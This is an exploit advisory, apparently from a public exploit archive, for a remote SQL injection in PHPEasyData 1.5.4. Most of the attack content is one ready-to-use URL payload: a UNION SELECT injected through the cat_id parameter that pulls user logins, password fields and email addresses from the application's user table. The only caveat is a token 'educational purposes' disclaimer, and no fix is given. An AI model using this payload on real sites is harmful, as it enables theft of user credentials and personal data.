PHPEasyData 1.5.4 (cat_id) Remote SQL Injection Vulnerability

2008-05-06 00:00:00

|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
| _ __ __ __ ______ |
| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ |
| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ |
| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ |
| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ |
| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ |
| \ \____/ >> Kings of injection |
| \/___/ |
| |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|

Title :: Remote SQL Injection

Author :: InjEctOr [s0f (at) w (dot) cn]
&& ToTaL [n.47 at hotmail.com]

Application :: PHPEasyData 1.5.4

Download :: http://www.phpeasydata.com/telecharger/phpeasydata-free-edition/index_fr.html

Dork 1 :: Not Yet :P

Greets :: Allah , InjEctOr5 TeaM ,TrYaG TeaM & Muslims Hackers
Terms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts.

--------------------------------------------[C o n t e x t]-----------------------------------------

Vulnerability: http://localhost/localhost/phpeasydata-1.5.4/annuaire.php?annuaire=68&sort_field=&cat_id=4+union+select+concat_ws(0x3a3a,user_id,user_login,user_pass,user_fname,user_lname,user_access,user_email)+from+an_users/*


-------------------------------------------[End of context]----------------------------------------

#

Fixes

No fixes

In order to submit a new fix you need to be registered.